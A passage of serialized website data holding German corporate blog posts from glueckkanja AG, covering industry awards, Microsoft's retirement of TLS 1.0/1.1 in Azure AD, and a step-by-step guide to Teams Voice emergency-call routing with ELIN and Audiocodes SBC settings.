studieren? Warum tut man das überhaupt? Hat man dann noch Freizeit? Das sind alles Fragen, die mir während meines berufsbegleitenden Studiums gestellt wurden und ich hatte nicht immer die richtige Antwort parat.","2021-02-26","/posts/2021-02-26-gkgab-studium",{"title":6210,"description":6215},"posts/2021-02-26-gkgab-studium",[474,4344],"eNJ0BsyFMEydxKieoDVBXdRB6I7KMZagk9k4NxrEqow",{"id":6297,"title":6298,"author":191,"body":6299,"cta":3,"description":6303,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6327,"moment":6331,"navigation":415,"path":6332,"seo":6333,"stem":6334,"tags":6335,"webcast":406,"__hash__":6336},"content_de/posts/2021-03-18-gkgab-microsoft-security-award.md","glueckkanja ist Finalist für den Microsoft Security 20/20 Award",{"type":350,"value":6300,"toc":6325},[6301,6304,6310,6313,6316,6319],[353,6302,6303],{},"glueckkanja AG wurde als einer der führenden Pioniere im Microsoft-Ökosystem zu den Finalisten für den Microsoft Security 20/20 Microsoft Security System Integrator of the Year Award ernannt. Das Unternehmen überzeugte in einem hochkarätigen Feld von Branchenführern durch seine herausragenden Leistungen in den Bereichen Innovation, Integration und Kundenimplementierung mit Microsoft-Technologien.",[353,6305,6306],{},[356,6307],{"alt":6308,"src":6309},"Jan Geisbauer Zitat","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-jan-quote.jpg",[353,6311,6312],{},"Bei der zweiten jährlichen Verleihung der Microsoft Security 20/20 Awards am 12. Mai 2021 werden die Finalisten in 18 Kategorien aus den Bereichen Sicherheit, Compliance und Identität ausgezeichnet.",[353,6314,6315],{},"\"Die Pandemie hat unsere Perspektive auf die Welt, die Rolle der Technologie und die Art und Weise, wie wir arbeiten, lernen und leben, für immer verändert\", sagt Rani Lofstrom, Senior Product Marketing Manager, Microsoft Global Security Partnerships. \"In Anbetracht unserer neuen Realität lautet das Thema der Microsoft Security 20/20 Awards in diesem Jahr 'Perspective-Through the Looking Glass'. Bei der diesjährigen Preisverleihung werden unsere Sicherheitspartner geehrt, die in einer beispiellosen Zeit des Wandels über sich hinausgewachsen sind, um Remote-Mitarbeiter überall zu unterstützen, zu sichern und zu schützen.\"",[353,6317,6318],{},"Die Microsoft Intelligent Security Association (MISA) wurde gegründet, um das Sicherheits-Ökosystem voranzubringen und eine Umgebung zu schaffen, in der Lösungsanbieter zusammenarbeiten können, um eine Zukunft zu schaffen, die für Menschen und Unternehmen gleichermaßen sicherer ist.",[353,6320,6321],{},[356,6322],{"alt":6323,"src":6324},"Microsoft Security System Integrator of the Year","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-msft-sec-2020.jpg",{"title":402,"searchDepth":403,"depth":403,"links":6326},[],{"categories":6328,"blogtitlepic":6329,"socialimg":6324,"customExcerpt":6330},[1117],"head-microsoft-sec-award-v02","glueckkanja AG wird für seine Leistungen im Cloud Security Operations Center ausgezeichnet und ist Finalist bei den Microsoft Security 20/20 Partner Awards für Microsoft Security System Integrator of the Year","2021-03-18","/posts/2021-03-18-gkgab-microsoft-security-award",{"title":6298,"description":6303},"posts/2021-03-18-gkgab-microsoft-security-award",[1117,410,3933],"hRyrbtg1nMAJdf8rd36GglwgZknm6tQe_dwY9j1rJMI",{"id":6338,"title":6339,"author":191,"body":6340,"cta":3,"description":6419,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6420,"moment":6425,"navigation":415,"path":6426,"seo":6427,"stem":6428,"tags":6429,"webcast":406,"__hash__":6431},"content_de/posts/2021-04-21-glueckkanja-gab-isg-award.md","glueckkanja gleich mehrfach von ISG ausgezeichnet",{"type":350,"value":6341,"toc":6417},[6342,6357,6368,6374,6393,6399],[353,6343,6344,6345,6348,6349,6352,6353,6356],{},"In der aktuellen ISG Provider Lens ",[1847,6346,6347],{},"TM"," \"Microsoft Ecosystem 2021\" des unabhängigen Beratungsunternehmens Information Services Group (ISG) wurde glueckkanja erneut ausgezeichnet: In der Kategorie ",[433,6350,6351],{},"Office 365 Integration"," setzen wir unsere Führungsrolle erfolgreich fort. Zusätzlich punkten wir deutlich im Quadranten ",[433,6354,6355],{},"Managed Service Provider für Azure",". Wir freuen uns sehr über diese Auszeichnung!",[353,6358,6359,6360,6363,6364,6367],{},"Der Office 365 Quadrant bewertet Dienstleiter, die Unternehmen bei der Einführung, Integration und dem laufenden Betrieb von Office 365 unterstützen. Unser bewährtes ",[433,6361,6362],{},"100 % Cloud-Konzept"," wurde hier erneut prämiert. Die Skalierbarkeit des Modern Workplace bei gleichzeitiger Standardisierung wurde als besondere Stärke hervorgehoben. Ein weiterer entscheidener Faktor für unser Ranking als ",[433,6365,6366],{},"Top-Performer"," ist die Geschwindigkeit, mit der wir unseren Blueprint ausrollen und dabei der IT-Sicherheit höchste Priorität verleihen. Besonders freut uns die Einschätzung der Analysten, die unseren Merger als Volltreffer bezeichnen.",[353,6369,6370],{},[356,6371],{"alt":6372,"src":6373},"Office 365 Quadrant","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg-o365-quadrant.png",[353,6375,6376,6377,6380,6381,6384,6385,6388,6389,6392],{},"Im Quadranten ",[433,6378,6379],{},"\"SAP on Azure\""," sind wir bereits ",[433,6382,6383],{},"Rising Star"," und bei  ",[433,6386,6387],{},"\"Managed Services on Azure\""," sehen uns die Analysten in zukünftigen Ausgaben der Studie klar als ",[433,6390,6391],{},"Kandidaten für den Leader-Quadranten",". Eine tolle Auszeichnung für unsere erst kurze Zeit in diesem Sektor. Entscheidend sind hier neue Zertifizierungen und weiteres Wachstum, das wir auf gesunde Art und Weise anstreben.",[353,6394,6395],{},[356,6396],{"alt":6397,"src":6398},"SAP on Azure","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg-sap-on-azure-quadrant.png",[353,6400,6401,6402,6405,6406,6410,6411,6416],{},"glueckkanja AG ist der Zusammenschluss der beiden Unternehmen Glück & Kanja und GAB zu einem Cloud Managed Service Provider. Beide Unternehmen gehören seit über 20 Jahren zu den führenden IT-Consultingunternehmen und Top-Partnern von Microsoft in Deutschland. Mit über 250.000 Managed Clients bei vielen Enterprise-Kunden wie DB Schenker, EnBW, Fuchs und Uniper sowie hunderten Mittelstandskunden liegt glueckkanja an der weltweiten Spitze. Treibender Faktor ist die Kombination aus Managed Services und eigenen Technologien und Lösungen, vor allem mit der Management-Plattform ",[374,6403,494],{"href":1843,"rel":6404},[378],", die Microsofts Endpoint Manager erheblich erweitert, dem ",[374,6407,6409],{"href":4374,"rel":6408},[378],"Cloud Security Operations Center",", das sämtliche Microsoft Security-Produkte als Service-Angebot integriert sowie der ",[374,6412,6415],{"href":6413,"rel":6414},"https://www.glueckkanja.com/de/technologien/microsoft-azure/",[378],"Azure Foundation",", die eine Sammlung von Azure Landing Zone-Architekturen und Best Practices aus vielen erfolgreich umgesetzten Projekten zur Verfügung stellt.",{"title":402,"searchDepth":403,"depth":403,"links":6418},[],"In der aktuellen ISG Provider Lens TM \"Microsoft Ecosystem 2021\" des unabhängigen Beratungsunternehmens Information Services Group (ISG) wurde glueckkanja erneut ausgezeichnet: In der Kategorie Office 365 Integration setzen wir unsere Führungsrolle erfolgreich fort. Zusätzlich punkten wir deutlich im Quadranten Managed Service Provider für Azure. Wir freuen uns sehr über diese Auszeichnung!",{"categories":6421,"blogtitlepic":6422,"socialimg":6423,"customExcerpt":6424},[410],"head-isg-award","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-isg-award.jpg","glueckkanja übernimmt nicht nur erneut die Spitzenposition im Leader-Quadranten der veröffentlichten ISG-Studie 2021 über den Office 365 Markt in Deutschland, sondern ist auch erstmals klar positioniert im Azure Managed Services Markt.","2021-04-21","/posts/2021-04-21-glueckkanja-gab-isg-award",{"title":6339,"description":6419},"posts/2021-04-21-glueckkanja-gab-isg-award",[6430,3933],"ISG","cdrC-Ry50GiOsJcwXLAtOo6JDhJlHjrtUXP2ty7Jo3M",{"id":6433,"title":6434,"author":140,"body":6435,"cta":3,"description":6441,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6538,"moment":6542,"navigation":415,"path":6543,"seo":6544,"stem":6545,"tags":6546,"webcast":406,"__hash__":6548},"content_de/posts/2021-05-03-deactivation-deprecated-TLS-protocols-in-AAD.md","Bye bye TLS 1.0 and TLS 1.1!",{"type":350,"value":6436,"toc":6536},[6437,6442,6450,6453,6460,6463,6489,6492,6500,6507,6518,6524,6527,6533],[353,6438,6439],{},[433,6440,6441],{},"Microsoft schaltet zum 30. Juni 2021 veraltete TLS Authentifizierungsprotokolle (TLS 1.0 / TLS 1.1) im Azure Active Directory aus Sicherheitsgründen ab. Da das Azure Active Directory (AzureAD) als zentraler Authentifizierungsdienst genutzt wird, hat das mitunter weitreichende Folgen.",[353,6443,6444,6445,456],{},"Hintergrund dafür ist das gezielte Schließen von kritischen Sicherheitslücken in der Authentifizierungskette gegenüber 3rd-Party-Anbietern, die in der Vergangenheit unter Namen wie Heartblead, POODLE, BEAST oder CRIME bekannt wurden. Durch die Abschaltung der veralteten Protokolle wird die Sicherheit für die gesamte Organisation deutlich verbessert. Weitere Dienste wie Google, Apple, Mozilla, ZScaler etc. haben ebenfalls eine Abschaltung der anfälligen TLS Authentifizierungsprotokolle angekündigt. Siehe auch die offizielle IETF Best Practice Empfehlung ",[374,6446,6449],{"href":6447,"rel":6448},"https://tools.ietf.org/html/rfc8996",[378],"RFC8996",[353,6451,6452],{},"Das AzureAD authentifiziert viele der derzeit über 17.000 cloudbasierten 3rd-Party-Anwendungen, von denen knapp ein Fünftel dafür bekannt sind, dass sie ausschließlich TLS 1.0 bzw. TLS 1.1 unterstützen. Darunter auch sehr namhafte Hersteller.",[353,6454,6455,6456,6459],{},"Office 365 wurde bereits vor einiger Zeit durch Microsoft erfolgreich auf die ",[433,6457,6458],{},"TLS 1.2 Authentifizierung"," umgestellt. Bei 3rd-Party-Anwendungen in der Cloud ist die Vorgehensweise anders. Hier müssen die Kunden selbst prüfen, ob sie betroffen sind. Im schlimmsten Fall können die entsprechenden Anwendungen nach dem 30. Juni 2021 nicht mehr genutzt werden und der Kunden muss sich darauf verlassen, dass die Hersteller nachziehen und ihre Authentifizierungsmethode umstellen.",[353,6461,6462],{},"Darüber hinaus gibt es eine Reihe von lokalen Abhängigkeiten, die auf Kundenseite in jedem Fall berücksichtigt werden müssen. Dazu gehören beispielsweise folgende Szenarien, die sich in irgendeiner Form gegen Azure AD authentifizieren:",[367,6464,6465,6468,6471,6474,6477,6480,6483,6486],{},[370,6466,6467],{},"Nutzung veralteter Betriebssysteme (z.B. Windows 7/8 ohne explizite „Nachrüstung“, Server älter als Windows Server 2012 R2) kann fehlschlagen",[370,6469,6470],{},"Nutzung von Webanwendungen mit veralteten Browsern (unter anderem aus Applikationskompatibilitätsgründen wie z.B. Internet Explorer 8-10 unter Windows 7) kann fehlschlagen",[370,6472,6473],{},"Neue Azure AD Geräteregistrierung auf älteren Betriebssystemen** kann fehlschlagen",[370,6475,6476],{},"Azure AD Connect, PTA Agenten oder AppProxy Konnektoren, die selbst veraltet sind** oder auf veralteten Betriebssystemen laufen und die TLS 1.2 nicht unterstützen, werden ggf. nicht mehr funktionieren",[370,6478,6479],{},"MFA Erweiterungen auf ADFS Servern oder NPS Erweiterungen für Azure MFA, die auf veralteten Betriebssystemen laufen und die TLS 1.2 nicht unterstützen, werden ggf. nicht mehr funktionieren",[370,6481,6482],{},"Azure AD integrierte Anwendungen und Powershell Scripte, die auf veralteten .NET Framework Versionen aufsetzen und die nicht für die Unterstützung von TLS 1.2 konfiguriert wurden, werden ggf. nicht mehr funktionieren",[370,6484,6485],{},"Software as a Service (SaaS) Anwendungen oder andere Line of Business (LOB) Anwendungen, die auf Plattformen gehostet werden, die keine TLS 1.2 Unterstützung bieten, werden ggf. nicht mehr funktionieren",[370,6487,6488],{},"Netzwerkverkehr, der über einen Webproxy mit „SSL Inspection“ geleitet wird und der TLS 1.2 nicht unterstützt, wird ggf. nicht mehr funktionieren",[353,6490,6491],{},"Diese Liste hat keinen Anspruch auf Vollständigkeit, soll jedoch die offensichtlichen Fälle berücksichtigen.",[353,6493,6494,6495,6499],{},"Sie können ",[374,6496,1491],{"href":6497,"rel":6498},"https://servicetrust.microsoft.com/AdminPage/TlsDeprecationReport/Download",[378]," einen Microsoft Azure AD Report über veraltete Authentifizierungsverfahren samt genutzter Protokolle erhalten, die das Azure AD in Ihrem Mandanten durchführt.",[353,6501,6502,6503],{},"Weitere Hilfe finden Sie auch in folgendem Microsoft Artikel:\n",[374,6504,6505],{"href":6505,"rel":6506},"https://docs.microsoft.com/de-de/troubleshoot/azure/active-directory/enable-support-tls-environment",[378],[353,6508,6509,6510,6513,6514,456],{},"Eine SSL TLS Unterstützungsdiagnose kann außerdem mittels dieser Website durchgeführt werden (",[433,6511,6512],{},"Hinweis:"," Bei der Authentifizierung spielen in der Regel mehrere URLs eine Rolle, die jeweils gesondert geprüft werden müssen):\n",[374,6515,6516],{"href":6516,"rel":6517},"https://www.ssllabs.com/ssltest/",[378],[353,6519,6520],{},[356,6521],{"alt":6522,"src":6523},"SSL Server Test","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-configuration.png",[353,6525,6526],{},"Kunden, die unseren 100 % Cloud Blueprint vollständig umgesetzt haben, sind hier klar im Vorteil. Unsere Must-Have-Anforderungen sind Microsoft 365 E3 + E5 Security (SKUs). Damit haben sie uneingeschränkten Zugriff auf die Microsoft Cloud App Security mit seinem umfangreichen Cloud App Catalog (17.000 + SaaS-Anwendungen). Betroffenen Anwendungen können dort gefiltert werden.",[353,6528,6529],{},[356,6530],{"alt":6531,"src":6532},"Cloud App Security","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cloud-app-sec.png",[353,6534,6535],{},"Sollten Sie darüber hinaus professionelle Hilfe wünschen, stehen Ihnen unsere Kollegen gerne zur Seite.",{"title":402,"searchDepth":403,"depth":403,"links":6537},[],{"categories":6539,"blogtitlepic":6540,"socialimg":6541,"customExcerpt":6441},[534],"head-tls-protocol-deprecated-v02","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-tls-protocol-deprecated-v02.jpg","2021-05-03","/posts/2021-05-03-deactivation-deprecated-tls-protocols-in-aad",{"title":6434,"description":6441},"posts/2021-05-03-deactivation-deprecated-TLS-protocols-in-AAD",[534,1772,422,3699,966,6547],"TLS Protocol","f7MgOrIEsmi6uPsCfTF47PdaFwapsOao034ZAtn4TPM",{"id":6550,"title":6551,"author":182,"body":6552,"cta":3,"description":6558,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6819,"moment":6824,"navigation":415,"path":6825,"seo":6826,"stem":6827,"tags":6828,"webcast":406,"__hash__":6832},"content_de/posts/2021-05-11-emergency-address.md","Can Microsoft Teams call 911?",{"type":350,"value":6553,"toc":6817},[6554,6559,6567,6578,6592,6599,6605,6608,6614,6617,6620,6625,6632,6635,6641,6644,6647,6653,6660,6665,6672,6677,6680,6683,6686,6692,6697,6730,6733,6738,6741,6744,6747,6750,6753,6759,6762,6768,6771,6785,6788,6794,6797,6800,6806,6809,6814],[353,6555,6556],{},[433,6557,6558],{},"In jedem Teams Voice Projekt kommt man mit dem Kunden an den Punkt, dass man über ein Konzept für Notrufe sprechen muss. Unsere generelle Empfehlung ist, die Mitarbeiter anzuweisen, Notrufe vom Mobiltelefon aus zu tätigen. Dies ist jedoch nicht bei allen Kunden möglich. Daher muss auch dieses Szenario mit den Möglichkeiten der Teams Voice Plattform abgedeckt werden. Grundsätzlich gibt uns die Notrufkonfiguration in Teams zwei Optionen, die ineinandergreifen:",[367,6560,6561,6564],{},[370,6562,6563],{},"Korrektes Routing von Notrufen anhand einer ELIN Nummer",[370,6565,6566],{},"Realisierung der Rückrufmöglichkeit, falls der Notruf vorzeitig getrennt wird",[353,6568,6569,6570,6573,6574,6577],{},"Notrufe werden bei den meisten deutschen Carriern anhand des ",[433,6571,6572],{},"P-Asserted Identity Headers (PAI)"," in der SIP Message an den nächstgelegenen ",[433,6575,6576],{},"Public Safety Answering Point (PSAP)"," geroutet. Um genau das zu gewährleisten, ist die Konfiguration von folgenden Punkten in Teams notwendig:",[367,6579,6580,6583,6586,6589],{},[370,6581,6582],{},"Konfiguration der Public Trusted IP’s",[370,6584,6585],{},"Anlegen von privaten Subnets und Locations",[370,6587,6588],{},"Bereitstellung einer Emergency Addresse",[370,6590,6591],{},"Vorhalten einer ELIN Rufnummer",[353,6593,6594,6595,6598],{},"Teams prüft für die Zuordnung einer Emergency Adresse zunächst die Trusted IP. Hierbei handelt es sich um die öffentliche IP-Adresse des Standorts, von dem aus sich der Client anmeldet. Es ist essenziell, dass alle genutzten öffentlichen IP-Adressen von potenziellen Standorten im ",[433,6596,6597],{},"Teams Admin Center (TAC)"," hinterlegt werden. Dazu gehören auch eventuell verwendete IPv6-Adressen!",[353,6600,6601],{},[356,6602],{"alt":6603,"src":6604},"Was ist meine IP","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-was-ist-meine-ip.png",[353,6606,6607],{},"Im TAC sieht die Konfiguration basierend auf dem obigen Beispiel wie folgt aus:",[353,6609,6610],{},[356,6611],{"alt":6612,"src":6613},"Network Topology","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-network-topology.png",[353,6615,6616],{},"Es ist zu beachten, dass die öffentlichen IP-Adressen eine Network Range benötigen. Diese sollten so gewählt werden, dass die Range alle vom Standort verwendeten Adressen enthält.",[353,6618,6619],{},"Als ersten Schritt aktivieren wir die PIDF/LO Option Option auf dem Session Border Controller (SBC) im TAC. Das sorgt dafür, dass die genauen Lokationsdaten als XML in den SIP Messages an die Notfalleinsatzleitzentrale übermittelt werden können.",[353,6621,6622],{},[356,6623],{"alt":1332,"src":6624},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-direct-routing.png",[353,6626,6627,6628,6631],{},"Als nächstes wird eine Network Site angelegt. Die Site bildet hierbei einen logischen Standort mit allen dort enthaltenen Subnetzen ab, ist aber für die Übermittlung der Emergency Addresse nicht zwingend erforderlich. Die Network Site wird für dynamisches Emergency Routing verwendet, da an eine Site eine ",[433,6629,6630],{},"Emergency Call Routing Policy"," assoziiert werden kann. Somit ist an jedem Standort des Unternehmens sichergestellt, dass Notrufe über die korrekte Nummer und das korrekte PSTN Gateway geroutet werden.",[353,6633,6634],{},"Alle Sites müssen Mitglied einer Network Region sein. Standorte in Deutschland werden z.B. in einer Region „Germany“ aggregiert. Die Region fungiert hierbei, ähnlich den PSTN Usages, nur als Container.",[353,6636,6637],{},[356,6638],{"alt":6639,"src":6640},"Network Region","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-network-site.png",[353,6642,6643],{},"Weiter geht es mit der Erstellung von Emergency Addresses. Diese stellen den zentralen Punkt der Konfiguration dar und sind der wichtigste Schritt für das Routing der Notrufe. Die erfassten Emergency Adresses werden relativ schnell nach dem Anlegen verifiziert und können danach nicht mehr geändert werden! Wenn beispielsweise die Straße, Hausnummer oder ELIN-Telefonnummer nachträglich geändert werden soll, muss die komplette Emergency Address gelöscht und neu angelegt werden.",[353,6645,6646],{},"Über das TAC kann die Adresse des Standorts im jeweiligen Land angegeben werden. Die Adresse sollte dabei nach Möglichkeit nicht manuell eingegeben werden. Eine manuelle Eingabe erfordert zwingend die Angabe von Längen- und Breitengrad ausserhalb der USA, da ansonsten keine Zuordnung zur Clientlocation stattfinden kann.",[353,6648,6649],{},[356,6650],{"alt":6651,"src":6652},"Clientlocation","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-client-location.png",[353,6654,6655,6656,6659],{},"Die Eingabe im Feld „ELIN (optional)“ ist hier ",[433,6657,6658],{},"besonders wichtig",". Das ist die dem Standort zugehörige Rufnummer, die später im PAI Header mitgesendet wird. Das Emergency Call Routing auf Seite der Carrier basiert auf der korrekten Eingabe der Nummer. Damit der Teams Client seinen Standort lokalisieren kann, müssen sogenannte Location Identifier an den Standort angefügt werden. Hierzu dienen Subnetze, Wireless Access Points, Switches und Switchports. Speziell bei den Subnetzen ist an dieser Stelle zu erwähnen, dass es sich hier nicht um die gleichen Objekte handelt, die bereits für die Network Site angelegt wurden. Um dies zu veranschaulichen, sehen wir uns kurz die PowerShell CMDlets an, die zum Erstellen von Location Identifier sowie Network Site Subnetze verwendet werden:",[353,6661,6662],{},[3724,6663,6664],{},"Set-CsOnlineLisSubnet -Subnet 192.168.178.0 -LocationId f037a9ad-4334-455a-a1c5-3838ec0f5d02 -Description \"HomeOffice\"",[353,6666,6667,6668,6671],{},"Hiermit wird das LIS Subnet 192.168.178.0 angelegt, das der Emergency Location mit der ID f037a9ad-4334-455a-a1c5-3838ec0f5d02 zugeordnet wird. LIS steht hierbei für ",[433,6669,6670],{},"Location Information Service"," und kommt aus der On-Premises Welt.",[353,6673,6674],{},[3724,6675,6676],{},"New-CsTenantNetworkSubnet -SubnetID \"192.168.178.0\" -MaskBits \"24\" -NetworkSiteID \"HomeOffice\"",[353,6678,6679],{},"Mit diesem CMDlet legen wir ein Subnet für eine zuvor erstelle Network Site „HomeOffice“ an. Wir können klar erkennen, dass hier zwei unterschiedliche Objekte angelegt werden, die miteinander auch nicht kombiniert werden können, da sie für unterschiedliche Einsatzzwecke erstellt wurden.",[353,6681,6682],{},"Für dieses Beispiel werden wir nun ein neues Subnetz anlegen und an den zuvor erstellten Notfallstandort anfügen.",[353,6684,6685],{},"Es gibt zwei Wege, eine neue Location im TAC anzulegen. Entweder man wählt die Emergency Address aus und fügt sie direkt hinzu oder aber man ergänzt sie unter „Networks & Locations“. Beide Wege führen im Backend das gleiche Doing aus. Sowohl Emergency Address als auch die Location Identifier sind zwei unabhängige Objekte, die miteinander verknüpft werden müssen.",[353,6687,6688],{},[356,6689],{"alt":6690,"src":6691},"Subnet Mask","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-subnet-mask.png",[353,6693,6694],{},[433,6695,6696],{},"Wichtige Information bzgl. Subnets",[2559,6698,2557,6700],{"className":6699},[2556],[2559,6701,6703,6704,2566,6717,2557],{"className":6702},[2562],"\n      ",[2559,6705,6709,6710,6703],{"className":6706},[6707,6708],"col-sm-offset-1","col-sm-4","\n          ",[2559,6711,6712,6713,6709],{},"\n              ",[356,6714],{"src":6715,"style":6716},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-subnet-examples.png","padding-bottom: 25px;",[2559,6718,2571,6722,2566],{"className":6719,"style":6721},[6720],"col-sm-7","padding-top: 25px;",[2559,6723,6712,6724,6712,6727,2571],{},[353,6725,6726],{},"Eigentlich ist das Wording an dieser Stelle falsch. Da wir beim Anlegen keine Netzmaske mitgeben, kann es sich allein deshalb schon nicht um ein Subnet handeln. Korrekt ist nämlich, dass hier eine Netzadresse angegeben wird. Der Teams Client rechnet sich aus der IP Adresse selbstständig die zugehörige Netzadresse aus.",[353,6728,6729],{},"Die Beispiele aus dem Screenshot zeigen, welche Adressen im TAC als Location Identifier hinterlegt werden müssten.",[353,6731,6732],{},"Im letzten Schritt legen wir im TAC eine Emergency Call Routing Policy an und weisen sie unserem Testuser zu. Diese Policy legt fest, welche Nummer(n) als Notrufnummer deklariert wird / werden. Wir können die Nummer auch separat normalisieren und ins PSTN routen. Besonders der letzte Punkt kann essenziell sein. Wenn der Kunde mit sehr restriktiven Voice Routes und PSTN Usages arbeitet, kann es ratsam sein, eine gesonderte Route und PSTN Usage für Notrufe anzulegen und zuzuweisen.",[353,6734,6735],{},[356,6736],{"alt":1332,"src":6737},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-sbcs-enrolled.png",[353,6739,6740],{},"In der obigen Konfiguration wurde die 115 als Notfallrufnummer hinterlegt, die 222 als Maskierung / Normalisierung. Alles wird über die Catch All Usage ins PSTN gesendet.",[353,6742,6743],{},"Der User kann direkt die 115 oder 222 in seinem Teams Client wählen, um einen Notruf abzusetzen. Die Zuweisung dieser Policy erfolgt entweder direkt an dem Benutzer im TAC oder über die zuvor erstelle Network Site. Die Network Site hat den Vorteil, dass alle Benutzer, die dort lokalisiert sind, die Policy automatisch zugewiesen bekommen. Eine gruppenbasierte Zuweisung der Emergency Call Routing Policys gibt es derzeit nicht.",[353,6745,6746],{},"Nun folgt die abschließende Konfiguration auf Seiten des SBCs. Da wir primär mit Audiocodes zusammenarbeiten, werden wir in diesem Artikel auf die ELIN Konfiguration basierend auf Audiocodes eingehen.",[353,6748,6749],{},"ELIN ist bei Audiocodes eine separate Lizenz, die auf dem SBC benötigt wird. Diese muss also erst vorhanden und aktiviert sein, bevor man die vollständige ELIN Konfiguration testen kann.",[353,6751,6752],{},"Der erste Schritt der Konfiguration ist die Aktivierung des PSAP Mode auf der IP-Gruppe, die in Richtung des Carriers zeigt.",[353,6754,6755],{},[356,6756],{"alt":6757,"src":6758},"SBC Advanced","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-sbc-advanced.png",[353,6760,6761],{},"Als nächstes kann der E911 Callback Timeout angepasst werden. Dieser legt fest, wie lange die ELIN Nummer zusammen mit der abgehenden Nummer in der ELIN Tabelle des SBC’s gespeichert wird.",[353,6763,6764],{},[356,6765],{"alt":6766,"src":6767},"Topology View","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-topology-view.png",[353,6769,6770],{},"30 Minuten ist die Default Konfiguration und sollte auch für die meisten Szenarien ausreichend sein.\nNachdem ein Notruf getätigt wurde, kann man über eine SSH Verbindung zum SBC und dem Befehl „show voip e911“ die ELIN Tabelle auslesen. Die vollständige Konfiguration funktioniert dann wie folgt:",[367,6772,6773,6776,6779,6782],{},[370,6774,6775],{},"Der User wählt die in der Emergency Call Routing Policy hinterlegte oder maskierte Nummer",[370,6777,6778],{},"Dadurch wird in Richtung SBC ein Notruf signalisiert und der SIP Header im Invite wird mit „priority: emergency“ ausgestattet und der PAI wird mit der im Emergency Standort hinterlegten ELIN Nummer getauscht",[370,6780,6781],{},"Über die im SBC auf der IP-Gruppe Richtung Carrier aktivierten PSAP Option wird die Kombination aus „Call From“ und „PAI“ in der ELIN Tabelle des SBC für 30 Minuten gespeichert",[370,6783,6784],{},"Im Fall, dass der Notruf vorzeitig unterbrochen wird, kann die Notfalleinsatzleitzentrale über die im PAI übermittelte Nummer einen Rückruf einleiten und wird an die Nebenstelle geroutet, die den Notruf initiiert hat",[353,6786,6787],{},"Im Syslog stellt sich der ausgehende Invite folgendermaßen dar:",[353,6789,6790],{},[356,6791],{"alt":6792,"src":6793},"Syslog","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-syslog.png",[353,6795,6796],{},"Die beiden rot markierten Stellen sind die beiden Header, die eingefügt bzw. ersetzt werden (PAI). Weitere Daten werden über die Konfiguration der Emergency Adresse übertragen. Sie sind im PIDF/LO XML abgebildet. In Deutschland können sie noch nicht ausgewertet werden und sind Stand heute nur für E911 in den USA relevant. Mit dem hier beschriebenen Setup sind aber bereits alle wichtigen Module eingestellt, so dass im Falle einer Auswertung durch deutsche Notrufzentralen bereits alles korrekt übertragen wird.",[353,6798,6799],{},"Und schließlich die ELIN Tabelle aus dem Audiocodes SBC:",[353,6801,6802],{},[356,6803],{"alt":6804,"src":6805},"SBC ELIN","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-sbc-elin.png",[353,6807,6808],{},"Hier ist gut zu erkennen, dass die in der ELIN Tabelle gespeicherte Nummer mit der ELIN Nummer des Standorts übereinstimmt und dem Call From zugeordnet ist.",[353,6810,6811],{},[433,6812,6813],{},"Summary",[353,6815,6816],{},"Microsoft Teams bietet uns mittlerweile eine gute Lösung, um Notrufe von bekannten Standorten abzudecken und diese richtig zu routen. Voraussetzung ist, dass alle benötigten Network Identifier bekannt sind und im TAC fortlaufend gepflegt sind. Das bringt uns nicht nur ein sauberes Notrufrouting, sondern erlaubt uns auch, bei Problemen mit der Anrufqualität über das Call Quality Dashboard einfach und schnell potenzielle Störungen in bestimmten Netzwerksegmenten aufzudecken. Also definitiv eine Aufgabe, die man auf dem Radar haben sollte, wenn man Teams Voice einsetzt. Wir empfehlen nach wie vor, bei Notrufen so weit wie möglich Mobiltelefone zu nutzen. Moderne Kommunikationslösungen stoßen einfach an ihre Grenzen, vor allem wenn Anwender zunehmend von zu Hause aus arbeiten oder viel unterwegs sind.",{"title":402,"searchDepth":403,"depth":403,"links":6818},[],{"categories":6820,"blogtitlepic":6821,"socialimg":6822,"customExcerpt":6823},[534],"head-emergency-calls","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-emergency-calls.jpg","In allen Teams Voice Projekten kommt man mit dem Kunden an den Punkt, dass man über ein Konzept für Notrufe sprechen muss. Unsere generelle Empfehlung ist, die Mitarbeiter anzuweisen, Notrufe von ihrem Handy aus zu tätigen. Dies ist jedoch nicht bei allen Kunden möglich. Daher muss auch dieses Szenario mit den Möglichkeiten der Teams Voice Plattform abgedeckt werden.","2021-05-11","/posts/2021-05-11-emergency-address",{"title":6551,"description":6558},"posts/2021-05-11-emergency-address",[534,964,422,964,6829,6830,6831],"Voice","SBC","Routing","xWAHHWWq4jgAinDzQ-yb0b8Rs5nwl-HajEgpcEERw5A",{"id":6834,"title":6835,"author":78,"body":6836,"cta":3,"description":6842,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6903,"moment":6907,"navigation":415,"path":6908,"seo":6909,"stem":6910,"tags":6911,"webcast":406,"__hash__":6915},"content_de/posts/2021-06-10-external-flag-for-outlook-mails.md","Externe Emails besser erkennen",{"type":350,"value":6837,"toc":6901},[6838,6843,6846,6860,6863,6869,6872,6875,6878,6881,6887,6890],[353,6839,6840],{},[433,6841,6842],{},"Mail ist ein beliebtes und oft lohnendes Ziel für Angriffe, trotz aller modernen Schutzmaßnahmen. Sie sind meist so gut gestaltet, dass es fast unmöglich ist, zu erkennen, dass es 